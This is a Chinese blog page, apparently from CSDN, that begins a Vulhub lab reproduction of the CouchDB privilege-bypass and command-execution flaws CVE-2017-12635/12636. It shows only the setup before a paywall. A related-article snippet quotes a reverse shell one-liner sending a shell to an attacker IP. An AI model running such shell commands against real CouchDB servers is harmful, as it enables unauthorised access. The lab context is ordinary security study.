CouchDB 漏洞复现 CVE-2017-12635/12636

最新推荐文章于 2024-05-18 08:00:00 发布
最新推荐文章于 2024-05-18 08:00:00 发布
阅读量369 收藏
点赞数
文章标签: couchdb 安全性测试 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sechelper/article/details/128989477
版权

前言

CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。

影响版本:

​ 小于 1.7.0 以及小于 2.1.1

漏洞复现

环境搭建

使用Vulhub的漏洞平台进行复现

image-20230115162346004

docker-compose up -d

image-20230115162901210

访问http://192.168.52.128:5984/_utils/#login出现如下页面搭建成功

image-20230115163004477

最低0.47元/天 解锁文章
助安社区
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
05-05
Apache CouchDB 信息泄露漏洞(CVE-2023-26268)通告 Apache CouchDB 是一个开源的 NoSQL 文档数据库,以基于 JSON 的文档格式收集和存储数据,提供了高可用性和高可靠性。近日,深信服安全团队监测到 Apache ...
excel-couchdb-import:将Excel工作表导入到CouchDBPouchDB
05-17
excel-couchdb-import Excel文件(* .xls,*。xslx)导入CouchDB / PouchDB文档,并将工作表转换为JSON。 用法 文档更新冲突是可能的,将被忽略。 excel-couchdb-import path/to/file.xls \ --target ...
漏洞复现----50、Couchdb 垂直权限绕过漏洞CVE-2017-12635
七天
07-08 1570
Couchdb 垂直权限绕过漏洞CVE-2017-12635
CouchDB任意命令执行(CVE-2017-12636
Kevin's Blog
07-26 969
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 攻击过程五、防御措施 一、漏洞原理   CountDB通过RESTful JavaScript Object Notation (JSON) API访问,CouchDB默认在5984开放Restful的API接口,用于数据库管理。由于CouchDB允许用户指定一个二进制程序或脚本,于Cou...
未授权访问:CouchDB 未授权访问漏洞
最新发布
qq_68163788的博客
05-18 397
Apache CouchDB是一个开源数据库,应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序),默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。 其HTTP Server默认开启时没有进行验证,而且绑定在0.0.0.0,所有用户均可通过API访问导致未授权访问。
Couchdb 任意命令执行漏洞(CVE-2017-12636)
weixin_46239998的博客
01-01 764
command = rb"""sh -i >& /dev/tcp/192.168.217.128/5566 0>&1""" # 这里的ip为监听机ip也就是攻击机。target = 'http://192.168.217.128:5984' # 目标ip。如上图所示即反弹shell成功!三、构造payload。
couchdb 任意命令执行漏洞 cve-2017-12636
whatday的专栏
01-30 314
Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 漏洞简介: CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Obj
Couchdb 任意命令执行漏洞CVE-2017-12636
时光凉春衫薄的博客
12-07 1913
产品样子 该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户。 首先通过(CVE-2017-12635漏洞创建一个用户qwe 密码也是qwe 1.6.0 下的说明 依次执行如下请求即可触发任意命令执行: 查看命令执行的结果 按照 vulhub中提示的环境来看这些命令也可以通过curl命令进行 其中,`vulhub:vulhub`为管理员账号密码。 curl -X PUT 'ht...
couchdb-query-explorer:“ couchdb-query-explorer”有助于轻松查询CouchDB NoSQL数据库
02-04
长沙发查询查询器“ couchdb-query-explorer”有助于轻松查询。 如何建造? 这是一个Angular 7项目,运行常规命令: npm安装ng serve(在端口4200上运行本地服务器) ./docker-build.sh(创建生产版本并将其捆绑在...
couchdb-github-action:在Github Action上运行CouchDB
02-05
couchdb-github-action:在Github Action上运行CouchDB
vulhub漏洞复现-CouchDB(CVE-2017-12635/6)垂直越权漏洞远程代码执行
遇事不决冲冲冲
11-03 3464
CouchDB Apache CouchDB是一个开源的数据库,面向文档的数据库管理系统,专注易用性"完全使用Web"。使用JSON作为存储格式,JavaScript为查询语言,MapReduce和HTTP作为API的NoSQL数据库 CVE-2017-12635垂直越权漏洞 思路 由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。可用于非管理员用户赋予自身管理员身份权限。 在Erlang: > jiffy:decode(“{“a”:”1″, “a”:”2
CVE-2022-24706 Apache CouchDB 远程命令执行漏洞
include_voidmain的博客
07-14 2404
CVE-2022-24706 Apache CouchDB 远程命令执行漏洞
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2024-12636
04-16 791
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。基本上主流的和经典的都有,这里我就不放图了,版权问题,个人看看是没有问题的。
服务攻防-数据库安全-Influxdb&H2database&CouchDB&ElasticSearch数据库漏洞复现
ran的博客
05-07 2274
默认端口:InfluxDB 是一个开源的时间序列数据库,旨在处理大规模数据处理和分析的高写入和查询负载。它针对实时存储和查询大量时间戳数据进行了优化。InfluxDB 提供了一种类似 SQL 的查询语言称为 InfluxQL,允许用户从数据库中检索和操作数据。它还支持各种客户端库和插件,以与其他数据源和工具集成。InfluxDB 的一些主要特点包括:高写入和查询性能:InfluxDB 优化了高吞吐量数据摄取和检索,非常适合实时数据处理和分析。
Vulhub漏洞系列:Couchdb漏洞CVE-2017-12635CVE-2017-12636
weixin_43072923的博客
05-24 1491
Vulhub漏洞系列:Couchdb漏洞CVE-2017-12635CVE-2017-12636)00.前言01.Couchdb简介02.漏洞描述03.漏洞复现 00.前言 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.Couchdb简介 CouchDB是一个利用JSON文件来存贮数据,javascript作为MapReduce查询,以及常规HTTP作为API的且面向文档的开源数据库管理系统。 02.漏洞描述 0x01:CVE-2017
CouchDB漏洞复现
weixin_44259979的博客
10-07 786
CouchDB漏洞复现
source /etc/profile mkdir -p /home/ubuntu/gopath/src/github.com/hyperledger cd /home/ubuntu/gopath/src/github.com/hyperledger cp /resource/docker-compose /usr/local/bin chmod +x /usr/local/bin/docker-compose cp /resource/fabric-samples.tar.gz /home/ubuntu/gopath/src/github.com/hyperledger cd /home/ubuntu/gopath/src/github.com/hyperledger tar -xf ./fabric-samples.tar.gz source /etc/profile cd /home/ubuntu/gopath/src/github.com/hyperledger/fabric-samples/scripts ./bootstrap.sh 1.4.0 1.4.0 0.4.14 cd /home/ubuntu/gopath/src/github.com/hyperledger/fabric-samples/first-network ./byfn.sh up -s couchdb docker-compose -f docker-compose-cli.yaml -f docker-compose-couch.yaml -f docker-compose-kafka.yaml start ../bin/configtxgen -profile TwoOrgsChannel -outputCreateChannelTx channel-artifacts/test.tx -channelID test
06-07
13. 执行 `./byfn.sh up -s couchdb` 命令,启动第一个网络,并使用 CouchDB 作为状态数据库; 14. 执行 `docker-compose -f docker-compose-cli.yaml -f docker-compose-couch.yaml -f docker-compose-kafka.yaml ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值